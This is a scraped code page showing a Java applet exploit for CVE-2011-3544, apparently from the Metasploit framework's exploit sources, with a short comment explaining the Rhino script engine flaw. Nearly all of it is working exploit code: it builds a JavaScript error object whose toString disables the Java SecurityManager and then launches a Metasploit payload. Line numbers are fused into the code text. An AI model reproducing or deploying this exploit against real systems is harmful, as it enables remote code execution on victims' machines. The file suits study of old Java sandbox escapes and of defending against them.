Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/external/source/exploits/CVE-2011-3544/Exploit.java
Views: 11780
/*1* Oracle Java Applet Rhino Script Engine Remote Code Execution2* CVE-2011-35443* ZDI-11-3054*5* This vulnerability is due to the way Rhino error objects are handled. Normally the script engine6* has to ensure untrusted code not being allowed to perform, but a malicious attacker can actually7* bypass this by creating an error object (which isn't checked by Rhino Script Engine), with a8* custom 'toString()' method to allow code being run with full privileges. This also allows the9* attacker to disable Java SecurityManager, and then run abitrary code.10*11* Ref:12* http://schierlm.users.sourceforge.net/CVE-2011-3544.html13*/1415import java.applet.Applet;16import javax.script.*;17import javax.swing.JList;18import metasploit.Payload;1920public class Exploit extends Applet {21public void init() {22try {23ScriptEngine engine = new ScriptEngineManager().getEngineByName("js");24Bindings b = engine.createBindings();25b.put("applet", this);2627// Disable SecurityManager, and then run the payload28// The error object isn't handled by Rhino, so the toString method29// will not be restricted by access control30Object proxy = (Object) engine.eval(31"this.toString = function() {" +32" java.lang.System.setSecurityManager(null);" +33" applet.callBack();" +34" return String.fromCharCode(97 + Math.round(Math.random() * 25));" +35"};" +36"e = new Error();" +37"e.message = this;" +38"e", b);3940JList list = new JList(new Object[] {proxy});41this.add(list);42}43catch (ScriptException e) {44e.printStackTrace();45}46}4748public void callBack() {49try {50Payload.main(null);51}52catch (Exception e) {}53}54}5556